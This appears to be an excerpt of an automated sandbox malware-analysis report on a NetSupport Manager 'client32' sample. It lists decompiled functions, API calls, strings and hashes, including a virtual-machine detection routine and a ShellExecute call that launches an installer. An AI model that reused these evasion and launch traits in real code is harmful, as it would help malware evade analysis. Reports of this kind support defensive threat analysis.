WSASetLastError.WSOCK32(00002747,?,68C6A730,?,00002000,,?,68C6ACF4,00000000,00000000,?,?,00000010,00000002,00000001,00000000), ref: 68C66F25
WSASetLastError.WSOCK32(00002745,68C6A730,?,00000001,00000000,?,68C6A730,?,00002000,,?,68C6ACF4,00000000,00000000,?,?), ref: 68C66F36

Strings

Content-Length:, xrefs: 68C66ECC
HTTP/, xrefs: 68C66E63
, xrefs: 68C66E79

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$_memset
String ID: $Content-Length:$HTTP/
API String ID: 536390146-1146010681
Opcode ID: 3c2aed8ec8919a6c6f0d77c5acd5b9bf029f37a3067362afc853b6e73c2829d3
Instruction ID: bdc97b25db1cb10cd90c24f6c0cbc1afabf787dfcda34cdaf5ee92e76e100d8e
Opcode Fuzzy Hash: 3c2aed8ec8919a6c6f0d77c5acd5b9bf029f37a3067362afc853b6e73c2829d3
Instruction Fuzzy Hash: B53148B5A44F01ABEB008A69ECD9F6B36685F80329FC00039EF3497281FB35D5978192

Function 68C80F90 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 68C80D40: LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,68C80F2B,21B321B5,00000000,?,?,68C9F278,000000FF,?,68C6AE0A,?,00000000,?,00000080), ref: 68C80D48
Part of subcall function 68C80D40: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 68C80D5B
Part of subcall function 68C80D40: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-68CACB4C,?,?,68C9F278,000000FF,?,68C6AE0A,?,00000000,?,00000080), ref: 68C80D76
Part of subcall function 68C80D40: _free.LIBCMT ref: 68C80D84
Part of subcall function 68C80D40: _malloc.LIBCMT ref: 68C80D8C
Part of subcall function 68C80D40: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,68C9F278,000000FF,?,68C6AE0A,?,00000000,?), ref: 68C80D9F
Part of subcall function 68C80D40: _free.LIBCMT ref: 68C80DAF

Part of subcall function 68C80970: LoadLibraryA.KERNEL32(ws2_32.dll), ref: 68C809A6
Part of subcall function 68C80970: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 68C809C3
Part of subcall function 68C80970: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 68C809CD
Part of subcall function 68C80970: GetProcAddress.KERNEL32(00000000,socket), ref: 68C809DB
Part of subcall function 68C80970: GetProcAddress.KERNEL32(00000000,closesocket), ref: 68C809E9
Part of subcall function 68C80970: GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 68C809F7
Part of subcall function 68C80970: FreeLibrary.KERNEL32(00000000), ref: 68C80A6C

LoadLibraryA.KERNEL32(ws2_32.dll), ref: 68C80FF6
GetProcAddress.KERNEL32(00000000,ntohl), ref: 68C8100C
_malloc.LIBCMT ref: 68C81020
_free.LIBCMT ref: 68C810E5
FreeLibrary.KERNEL32(?), ref: 68C810FA

Strings

ws2_32.dll, xrefs: 68C80FEB
ntohl, xrefs: 68C81006

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$Load_free$AdaptersAddressesFree_malloc
String ID: ntohl$ws2_32.dll
API String ID: 4086026317-4165132517
Opcode ID: 9c3318e2275aa12930dade24044402cd0425ba7256c8f68960cd5e1cc8c80190
Instruction ID: 4a0e99849febdbd2ddbc892c749cd4d416299a6f1891c30ae377a3bed60a4584
Opcode Fuzzy Hash: 9c3318e2275aa12930dade24044402cd0425ba7256c8f68960cd5e1cc8c80190
Instruction Fuzzy Hash: 994187F59402598BDB14DF29DC8479A7BF9BF45308F5084AAD8A993200FF359A85CFD0

Function 68C67EF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68C67F26
EnterCriticalSection.KERNEL32(68CAB898,?,?,-000397EB,?), ref: 68C67FF9
LeaveCriticalSection.KERNEL32(68CAB898,?,?,-000397EB,?), ref: 68C68047
EnterCriticalSection.KERNEL32(68CAB898,?,?,-000397EB,?), ref: 68C68052
LeaveCriticalSection.KERNEL32(68CAB898,?,?,-000397EB,?), ref: 68C6806A

Strings

RESULT, xrefs: 68C67F50
b, xrefs: 68C68032

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$_memset
String ID: RESULT$b
API String ID: 920729587-4141403093
Opcode ID: ec74e68c62cb86a3dc88d5dcc5e0b3851becdf6fc8917655fc59fa7fc1509e84
Instruction ID: 9d5ce3533fa6a4caeb1e347e3ac42ba426b81a1826c96674a693f62dcb0c92ba
Opcode Fuzzy Hash: ec74e68c62cb86a3dc88d5dcc5e0b3851becdf6fc8917655fc59fa7fc1509e84
Instruction Fuzzy Hash: D84191B4C4020DEEEF10DFA49C85BAE7AB4EF05319F40447AD819E6240F7359A84DBA6

Function 68C61000 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 101COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 68C6102B

Part of subcall function 68C81B69: __FF_MSGBANNER.LIBCMT ref: 68C81B82
Part of subcall function 68C81B69: __NMSG_WRITE.LIBCMT ref: 68C81B89
Part of subcall function 68C81B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,68C8D3C1,68C86E81,00000001,68C86E81,?,68C8F447,00000018,68CA7738,0000000C,68C8F4D7), ref: 68C81BAE

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=, xrefs: 68C610E6, 68C610F0, 68C610FD
base64.cpp, xrefs: 68C6103E, 68C6105F
VUUU, xrefs: 68C6100D
cchOut >= cchWorst, xrefs: 68C61064
@, xrefs: 68C610BE
pszOut, xrefs: 68C61043

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_malloc
String ID: @$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=$VUUU$base64.cpp$cchOut >= cchWorst$pszOut
API String ID: 501242067-340907830
Opcode ID: 7b03e7ef17b89ab22db40f314bad0bf5a085ccaf1102361e090c58b11045cb7a
Instruction ID: a2f51b82fae2767cd8b8f3706cd58f205bf33511e4d640c300f21254bb6cc066
Opcode Fuzzy Hash: 7b03e7ef17b89ab22db40f314bad0bf5a085ccaf1102361e090c58b11045cb7a
Instruction Fuzzy Hash: 9F318972905299CBCB008E2D9841689BBF5AFD1325F4D41B7F8549B301F236EA46C790

Function 1108B130 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 101timeCOMMON

Download Yara Rule

APIs

Part of subcall function 11089F90: _calloc.LIBCMT ref: 11089F9C
Part of subcall function 11089F90: _calloc.LIBCMT ref: 11089FB6
Part of subcall function 11089F90: _calloc.LIBCMT ref: 11089FC6
Part of subcall function 11089F90: _calloc.LIBCMT ref: 11089FD7
Part of subcall function 11089F90: _calloc.LIBCMT ref: 11089FE9
Part of subcall function 11089F90: _calloc.LIBCMT ref: 11089FFB

timeGetTime.WINMM ref: 1108B14F
timeGetTime.WINMM ref: 1108B17D
timeGetTime.WINMM ref: 1108B1BF
timeGetTime.WINMM ref: 1108B202

Strings

BuildLUT(p12to8), took %d ms, xrefs: 1108B20B
SampleData(%d*%d,%d), took %d ms, xrefs: 1108B18F
BuildDynamicPalette(%d*%d), took %d ms, xrefs: 1108B1CF

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _calloc$Timetime
String ID: BuildDynamicPalette(%d*%d), took %d ms$BuildLUT(p12to8), took %d ms$SampleData(%d*%d,%d), took %d ms
API String ID: 323206698-2628575008
Opcode ID: 992fa46bb3b47cefd940a57ada63a850b45b29b138b254c3f8a49154365181f5
Instruction ID: bb2eac5478b68b536a49f708560dc7754919b06093feb73e476f748ba0a9216f
Opcode Fuzzy Hash: 992fa46bb3b47cefd940a57ada63a850b45b29b138b254c3f8a49154365181f5
Instruction Fuzzy Hash: 36314FB9D04119AFDB10EFA8DC84AEFBBB8EB88718F104195FD0597241D634AE50CBE1

Function 68C67C60 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68C67C8D
EnterCriticalSection.KERNEL32(68CAB898,?,00000000,-000397EB,?), ref: 68C67D18
LeaveCriticalSection.KERNEL32(68CAB898,?,00000000,-000397EB,?), ref: 68C67D68
EnterCriticalSection.KERNEL32(68CAB898,?,00000000,-000397EB,?), ref: 68C67D6F
LeaveCriticalSection.KERNEL32(68CAB898,?,00000000,-000397EB,?), ref: 68C67D83

Strings

RESULT, xrefs: 68C67CB0
b, xrefs: 68C67D4D

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$_memset
String ID: RESULT$b
API String ID: 920729587-4141403093
Opcode ID: 5dbf1433e03d67b66ea6931cd8f7ebb6880176d05ebef107a75619cc4d57bee3
Instruction ID: 8b15c8b94a1499ba5b3d5e118194bf641716f67dfd9c2a45fdd8cf5851c5d279
Opcode Fuzzy Hash: 5dbf1433e03d67b66ea6931cd8f7ebb6880176d05ebef107a75619cc4d57bee3
Instruction Fuzzy Hash: CD3170B5D0020DAFEB10DFA8D881BAEBBF4EB48314F50446AD519E7240FB359A45DBA1

Function 68C7BB40 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 95COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 68C7BC28

Strings

NSMString.cpp, xrefs: 68C7BB57, 68C7BB9D, 68C7BBBB, 68C7BBFD, 68C7BC47
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 68C7BB81, 68C7BBDE
iAt+nUnits<=Length(), xrefs: 68C7BC02
iAt>=0 && iAt<Length(), xrefs: 68C7BBA2
IsA(), xrefs: 68C7BB5C, 68C7BB86, 68C7BBE3, 68C7BC4C
nUnits>=0, xrefs: 68C7BBC0

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: IsA()$NSMString.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$iAt+nUnits<=Length()$iAt>=0 && iAt<Length()$nUnits>=0
API String ID: 4104443479-3492528137
Opcode ID: 03d5d3ed645c10e441c892e7f5b628648f05f3d37b98b9fe9843e7bf539d2a89
Instruction ID: 4bdceb1a4100e28f70d261798820f240a7be1a31be0ee1c693571279aa85bbb9
Opcode Fuzzy Hash: 03d5d3ed645c10e441c892e7f5b628648f05f3d37b98b9fe9843e7bf539d2a89
Instruction Fuzzy Hash: A121053864061B6FD714DE59ECA1E3E33A49F9930DFD04028FE4C27245FB62AD8542D2

Function 68C7BD90 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 90COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 68C7BE4B
_memmove.LIBCMT ref: 68C7BE56

Strings

pszStr!=NULL, xrefs: 68C7BDCA
NSMString.cpp, xrefs: 68C7BDA7, 68C7BDC5, 68C7BDE3, 68C7BDFF, 68C7BE75
iAt>=0, xrefs: 68C7BDE8
IsA(), xrefs: 68C7BDAC, 68C7BE7A
iAt<=m_nLength, xrefs: 68C7BE04

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: IsA()$NSMString.cpp$iAt<=m_nLength$iAt>=0$pszStr!=NULL
API String ID: 4104443479-3876480746
Opcode ID: 2c16deb24df1fe4043a9cfd4adecc1b76a8184385f73bf0bc5661da9372f2d74
Instruction ID: 8f66890b4cf6235440861959787bb44354e8fbe7ada00e7f6fc63dfa517f4bf7
Opcode Fuzzy Hash: 2c16deb24df1fe4043a9cfd4adecc1b76a8184385f73bf0bc5661da9372f2d74
Instruction Fuzzy Hash: 6721007A64062A7FD7009A169CE4DBEB3A4AF9935CF804035FE5C67305FB20AD4642E2

Function 68C77D50 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 68C77E1B

Strings

VIRTNET, xrefs: 68C77D8D
Virtual, xrefs: 68C77DD0
0000000000, xrefs: 68C77E3C
VMware, xrefs: 68C77DB8
02004C4F4F50, xrefs: 68C77E23
%02X%02X%02X%02X%02X%02X, xrefs: 68C77E15

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _sprintf
String ID: %02X%02X%02X%02X%02X%02X$0000000000$02004C4F4F50$VIRTNET$VMware$Virtual
API String ID: 1467051239-555777999
Opcode ID: 2354238d9b5df1958c55ee412b481ccf7226491a23868d4edd245f3deb53e21f
Instruction ID: 795912dece660acde53590a60d7346257fe1bfe5f5afe84eda9ca2b2e5d2fd50
Opcode Fuzzy Hash: 2354238d9b5df1958c55ee412b481ccf7226491a23868d4edd245f3deb53e21f
Instruction Fuzzy Hash: 0821EAB594021D5FCB10C7759C20EFA7BF88F59309F804599E99E93140FA35A6089B60

Function 110310B0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Kernel32.dll,62C07B5E,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110310E2
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031120
GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 1103112E
SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031146
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031154

Strings

Kernel32.dll, xrefs: 110310DA
ProcessIdToSessionId, xrefs: 11031126

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCurrentErrorFreeLastLoadProcProcess
String ID: Kernel32.dll$ProcessIdToSessionId
API String ID: 1613046405-2825297712
Opcode ID: f4f0926271d226468653afaa46d6990833a17734d1eaad82ad6fde684afcfe5d
Instruction ID: dbcb6794e105daa586ddc3bbf804ff67aea9c2c21b85bbe8f4e4c15c2f8116d0
Opcode Fuzzy Hash: f4f0926271d226468653afaa46d6990833a17734d1eaad82ad6fde684afcfe5d
Instruction Fuzzy Hash: 9621A2B1D21269AFCB01DF99D884A9EFFB8FB49B15F10852BF521E3244D7B419018FA1

Function 110273F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 64COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B

wsprintfA.USER32 ref: 1102741E

Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,77068400,?), ref: 1113F937
Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
Part of subcall function 1113F8A0: CloseHandle.KERNEL32(00000000), ref: 1113F95F

wsprintfA.USER32 ref: 11027448
ShellExecuteA.SHELL32(00000000,open,?,/EM,00000000,00000001), ref: 1102749B

Strings

"%sWINSTALL.EXE", xrefs: 11027418
open, xrefs: 11027494
/EM, xrefs: 11027488
"%sWINST32.EXE", xrefs: 11027442

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: File$CreateFolderPathwsprintf$CloseExecuteHandleModuleNameShell
String ID: "%sWINST32.EXE"$"%sWINSTALL.EXE"$/EM$open
API String ID: 816263943-3387570681
Opcode ID: 474e4a5f26d8134d6f28c1743d0d9889b4922dd9f32edc34b04f7a1facad78e0
Instruction ID: 425802901d1907c5be7fd2b9c3bfd6c49e25210cb6f83e26e9bc69af70aaa39f
Opcode Fuzzy Hash: 474e4a5f26d8134d6f28c1743d0d9889b4922dd9f32edc34b04f7a1facad78e0
Instruction Fuzzy Hash: B411C875E0131EABDB11EBB5CC45FAAF7A89B04708F5041F5E91597181EB31B9048B91

Function 68C7DA30 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 52synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 68C7DA47
CreateThread.KERNEL32(00000000,?,?,?,00000000,?), ref: 68C7DA6A
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?), ref: 68C7DA97
CloseHandle.KERNEL32(?,?,00000000,?), ref: 68C7DAA1

Strings

Refcount.cpp, xrefs: 68C7DA7B
hThread, xrefs: 68C7DA80
0/Mw, xrefs: 68C7DA47

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID: 0/Mw$Refcount.cpp$hThread
API String ID: 3360349984-3373600596
